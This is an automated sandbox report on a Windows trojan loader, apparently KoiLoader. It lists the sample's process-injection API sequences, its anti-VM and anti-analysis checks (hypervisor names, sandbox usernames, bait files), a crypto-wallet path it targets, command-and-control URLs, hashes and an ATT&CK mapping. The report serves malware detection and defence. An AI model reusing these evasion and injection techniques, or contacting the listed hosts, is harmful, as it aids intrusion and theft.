Code function: 0_2_00151300 GetModuleHandleA,VirtualAlloc,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualFree,VirtualProtect,

0_2_00151300

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_00151710 mov ecx, dword ptr fs:[00000030h]	0_2_00151710
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_01097900 mov eax, dword ptr fs:[00000030h]	0_2_01097900
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_01095FB0 mov eax, dword ptr fs:[00000030h]	0_2_01095FB0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: 0_2_0015B779 GetProcessHeap,

0_2_0015B779

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_00155016 SetUnhandledExceptionFilter,	0_2_00155016
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_001549BE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_001549BE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_00154E89 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00154E89
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: 0_2_001576CB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_001576CB

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: 0_2_01095C50 GetModuleHandleW,GetProcAddress,CreateProcessW,NtQueryInformationProcess,ReadProcessMemory,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,

0_2_01095C50

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, \explorer.exe	0_2_010993B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe	0_2_010993B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	Code function: ExpandEnvironmentStringsW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetCurrentProcessId,OpenProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetWindowsDirectoryW,StrNCatW,VirtualAlloc,lstrcpyW,GetModuleFileNameW,ReadProcessMemory,ReadProcessMemory,CloseHandle,StrCmpIW, explorer.exe	0_2_010993B0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: 0_2_00155125 cpuid

0_2_00155125

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: 0_2_00154D70 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00154D70

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe

Code function: 0_2_010989B0 EnumDisplayDevicesW,EnumDisplayDevicesW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,EnumDisplayDevicesW,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,PathCombineW,GetFileAttributesW,PathCombineW,GetFileAttributesW,PathCombineW,PathCombineW,PathCombineW,GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapFree,PathCombineW,GetFileAttributesW,CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,lstrcmpA,GetProcessHeap,HeapFree,ExpandEnvironmentStringsW,GetFileAttributesW,GetFileAttributesExW,GetComputerNameW,GetUserNameW,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,lstrcmpW,lstrcmpW,StrStrW,lstrcmpW,lstrcmpW,lstrcmpW,GlobalMemoryStatusEx,lstrcmpW,lstrcmpW,lstrcmpW,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,FindNextFileW,FindClose,GetModuleFileNameW,StrStrIW,

0_2_010989B0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Access Token Manipulation	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	NTDS	1 Account Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	12 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Bypass User Account Control	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	78%	Virustotal		Browse
SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	79%	ReversingLabs	Win32.Trojan.AZORult
SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	100%	Avira	HEUR/AGEN.1317648
SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://217.195.153.196/academy.php	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://217.195.153.196/assets	SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe	true	unknown
http://217.195.153.196/academy.php%temp%	SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://217.195.153.196/assets/c	SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe, 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541791
Start date and time:	2024-10-25 06:31:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	1
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 5 Number of non-executed functions: 62
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.888796953554703
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe
File size:	193'024 bytes
MD5:	9e70e823876c7e83bf254d1f8fcbb3e5
SHA1:	dba226d7c283e53478e3f0b02b1ec8a8260dea57
SHA256:	fe75dacf62cfc6a628f60b49a8c670c55d3ab06ec825ea7d35b132bc8951626e
SHA512:	e33765646229cbb57407307cf6414ce12f0d51f9d21b457ba15620b52017359a85969ad80af3191169c29950737d08823a63f35ed4ff218bb48da55f86a535f0
SSDEEP:	3072:8A+MPNsjU+g/Pu92PkWMW50y4jrv34ClUCe3/VIvse7UUkKwYgO9ZvwvRGSCv:TJPxktlKdppYvDwv8SCv
TLSH:	37145C1B73D1483DD4B202322D76E9D4A93CFE244691CDEF63392C1E9AB02E165B18F6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oaN`+. 3+. 3+. 3`x#2!. 3`x%2.. 3`x$2?. 3..$29. 3..#2?. 3..%2.. 3`x!2,. 3+.!3A. 3..)2. 3...3. 3+..3. 3.."2. 3Rich+. 3.......

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4049b4
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66CDD42B [Tue Aug 27 13:27:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	66deda4204cb009d8c01c3f28c17567f

Entrypoint Preview

Instruction
call 00007F1E78B37CF9h
jmp 00007F1E78B3776Fh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0041305Ch]
push dword ptr [ebp+08h]
call dword ptr [00413058h]
push C0000409h
call dword ptr [0041300Ch]
push eax
call dword ptr [00413014h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [00413060h]
test eax, eax
je 00007F1E78B378F7h
push 00000002h
pop ecx
int 29h
mov dword ptr [0041BAB8h], eax
mov dword ptr [0041BAB4h], ecx
mov dword ptr [0041BAB0h], edx
mov dword ptr [0041BAACh], ebx
mov dword ptr [0041BAA8h], esi
mov dword ptr [0041BAA4h], edi
mov word ptr [0041BAD0h], ss
mov word ptr [0041BAC4h], cs
mov word ptr [0041BAA0h], ds
mov word ptr [0041BA9Ch], es
mov word ptr [0041BA98h], fs
mov word ptr [0041BA94h], gs
pushfd
pop dword ptr [0041BAC8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041BABCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041BAC0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041BACCh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [0041BA08h], 00010001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19c90	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d000	0x14814	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x32000	0x1248	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x18ac0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x18a00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x110f8	0x11200	f74d11cfe8e6d8e71072a0f11d9c7e99	False	0.5522496578467153	data	6.540620762088607	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x730c	0x7400	43bad7cdc02fea52ffa73e87a7e3367c	False	0.44396551724137934	OpenPGP Public Key	4.906263467320942	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x168c	0xa00	05e197c695a0d6994051ad539ab3ce55	False	0.176953125	data	2.3864029716696016	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1d000	0x14814	0x14a00	b3651ed889e1f7fe6b50a2c6ad5e489d	False	0.48055160984848483	data	4.861136097888206	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x32000	0x1248	0x1400	76ad3658e65dc48ccae7781fa560593e	False	0.7134765625	data	6.282640625763616	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_DIALOG	0x1d118	0x168	data	English	United States	0.6333333333333333
RT_RCDATA	0x1d280	0x14	data	English	United States	1.45
RT_RCDATA	0x1d294	0x14400	data	English	United States	0.4818431712962963
RT_MANIFEST	0x31694	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

VirtualFree, GetCurrentProcess, VirtualAlloc, TerminateProcess, GetModuleHandleA, GetLastError, GetProcAddress, ExitProcess, VirtualProtect, BuildCommDCBAndTimeoutsA, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, GetModuleHandleW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, RaiseException, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, HeapFree, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, DecodePointer

GDI32.dll

LPtoDP

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	00:32:13
Start date:	25/10/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.4644.8640.exe"
Imagebase:	0x150000
File size:	193'024 bytes
MD5 hash:	9E70E823876C7E83BF254D1F8FCBB3E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_KoiLoader_1, Description: Yara detected KoiLoader, Source: 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1809713648.000000000121E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	18%
Signature Coverage:	16.5%
Total number of Nodes:	1380
Total number of Limit Nodes:	8

Executed Functions

Function 010989B0 Relevance: 214.1, APIs: 79, Strings: 43, Instructions: 626
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 010989EE
StrStrIW.KERNELBASE(?,Hyper-V), ref: 01098A0D
StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 01098A23
StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 01098A39
EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 01098A4E
GetModuleHandleA.KERNEL32(kernel32), ref: 01098A59
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 01098A6D
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 01098A77
ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 01098AA3
ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 01098AB6
GetFileAttributesW.KERNELBASE(?), ref: 01098AC5
GetFileAttributesW.KERNEL32(?), ref: 01098AD7
SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 01098B0B
SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 01098B1C
PathCombineW.SHLWAPI(?,?,01092048), ref: 01098B31
GetFileAttributesW.KERNELBASE(?), ref: 01098B3E
PathCombineW.SHLWAPI(?,?,01092060), ref: 01098B90
GetFileAttributesW.KERNELBASE(?), ref: 01098B9D
PathCombineW.SHLWAPI(?,?,Resource.txt), ref: 01098BE6
PathCombineW.SHLWAPI(?,?,OpenVPN.txt), ref: 01098BFB
GetFileAttributesW.KERNELBASE(?), ref: 01098C0A
GetFileAttributesW.KERNEL32(?), ref: 01098C24
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 01098C5E
GetFileSize.KERNEL32(00000000,00000000), ref: 01098C6D
GetProcessHeap.KERNEL32(00000008,00000000), ref: 01098C79
HeapAlloc.KERNEL32(00000000), ref: 01098C80
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 01098C97
CloseHandle.KERNEL32(00000000), ref: 01098CA4
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 01098CC3
GetFileSize.KERNEL32(00000000,00000000), ref: 01098CD3
GetProcessHeap.KERNEL32(00000008,00000000), ref: 01098CDF
HeapAlloc.KERNEL32(00000000), ref: 01098CE6
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 01098CFF
CloseHandle.KERNEL32(00000000), ref: 01098D0E
lstrcmpA.KERNEL32(00000000,BAIT), ref: 01098D2A
lstrcmpA.KERNEL32(00000000,BAIT), ref: 01098D3A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01098D60
HeapFree.KERNEL32(00000000), ref: 01098D63
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01098D78
HeapFree.KERNEL32(00000000), ref: 01098D7B
PathCombineW.SHLWAPI(?,?,new songs.txt), ref: 01098D9E
GetFileAttributesW.KERNELBASE(?), ref: 01098DAB
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 01098DDE
GetFileSize.KERNEL32(00000000,00000000), ref: 01098DED
GetProcessHeap.KERNEL32(00000008,00000000), ref: 01098DF9
HeapAlloc.KERNEL32(00000000), ref: 01098E00
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 01098E17
CloseHandle.KERNEL32(00000000), ref: 01098E24
lstrcmpA.KERNEL32(00000000,Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo), ref: 01098E38
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01098E52
HeapFree.KERNEL32(00000000), ref: 01098E59
ExpandEnvironmentStringsW.KERNEL32(%appdata%\Jaxx\Local Storage\wallet.dat,?,00000104), ref: 01098E78
GetFileAttributesW.KERNELBASE(?), ref: 01098E85
GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 01098E9D
GetComputerNameW.KERNEL32(?,?), ref: 01098EC7
GetUserNameW.ADVAPI32(?,00000101), ref: 01098ED8
KiUserCallbackDispatcher.NTDLL(00000000), ref: 01098EE6
GetSystemMetrics.USER32(00000001), ref: 01098EED
lstrcmpW.KERNEL32(?,010921B8), ref: 01098F3E
StrStrW.SHLWAPI(?,d5.vc/g), ref: 01098F5B
lstrcmpW.KERNEL32(?,Bruno), ref: 01098F75
lstrcmpW.KERNEL32(?,DESKTOP-ET51AJO), ref: 01098F84
lstrcmpW.KERNEL32(?,010922B8), ref: 01098FB0
GlobalMemoryStatusEx.KERNELBASE(?), ref: 01098FD2
lstrcmpW.KERNEL32(?,Anna), ref: 01099000
lstrcmpW.KERNEL32(?,ANNA-PC), ref: 0109900F
lstrcmpW.KERNEL32(?,Admin), ref: 01099046
PathCombineW.SHLWAPI(?,?,01092324), ref: 01099077
FindFirstFileW.KERNELBASE(?,00000000), ref: 0109909E
lstrcmpW.KERNEL32(?,01092328), ref: 010990C0
lstrcmpW.KERNEL32(?,0109232C), ref: 010990D6
lstrcmpW.KERNELBASE(00000002,doc), ref: 01099119
lstrcmpW.KERNEL32(00000002,docx), ref: 01099125
lstrcmpW.KERNEL32(00000002,xls), ref: 01099131
lstrcmpW.KERNEL32(00000002,xlsx), ref: 0109913D
FindNextFileW.KERNELBASE(00000000,00000000), ref: 0109916D
FindClose.KERNEL32(00000000), ref: 0109917C
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 01099195
StrStrIW.SHLWAPI(?,powershell.exe), ref: 010991A7

Strings

Harry Johnson, xrefs: 01098F15
%appdata%\Jaxx\Local Storage\wallet.dat, xrefs: 01098E73
BAIT, xrefs: 01098D24, 01098D34
Recently.docx, xrefs: 01098B4F
d5.vc/g, xrefs: 01098F4F
FORTI-PC, xrefs: 01098F97
Opened.docx, xrefs: 01098B56
xls, xrefs: 0109912B
PJones, xrefs: 01098F0E
@, xrefs: 01098FC7
Admin, xrefs: 0109903A
sal.rosenburg, xrefs: 01098F23
Parallels Display Adapter, xrefs: 01098A17
Red Hat QXL controller, xrefs: 01098A2D
OpenVPN.txt, xrefs: 01098BE8
WDAGUtilityAccount, xrefs: 01098F1C
DESKTOP-ET51AJO, xrefs: 01098F7B
doc, xrefs: 01099110
Bruno, xrefs: 01098F69
STRAZNJICA.GRUBUTT, xrefs: 01098F00
%systemroot%\System32\VBoxService.exe, xrefs: 01098A9E
WILLCARTER-PC, xrefs: 01098F8E
new songs.txt, xrefs: 01098D8B
Files.docx, xrefs: 01098B6E
Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo, xrefs: 01098E32
Anna, xrefs: 01098FF4
ANNA-PC, xrefs: 01099006
xlsx, xrefs: 01099137
Paul Jones, xrefs: 01098F07
docx, xrefs: 0109911F
Resource.txt, xrefs: 01098BD9
These.docx, xrefs: 01098B60
%systemroot%\System32\VBoxTray.exe, xrefs: 01098AB1
Wow64RevertWow64FsRedirection, xrefs: 01098A6F
Hyper-V, xrefs: 01098A00
powershell.exe, xrefs: 0109919B
7, xrefs: 01098E2C
Are.docx, xrefs: 01098B67
7, xrefs: 01098EA7
SFTOR-PC, xrefs: 01098F9E
Wow64DisableWow64FsRedirection, xrefs: 01098A67
Joe Cage, xrefs: 01098EF7
kernel32, xrefs: 01098A54

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: File$lstrcmp$Heap$Attributes$Path$CombineProcess$CloseHandle$AllocCreateEnvironmentExpandFindFreeNameReadSizeStrings$AddressDevicesDisplayEnumFolderModuleProcUser$CallbackComputerDispatcherFirstGlobalMemoryMetricsNextStatusSystem
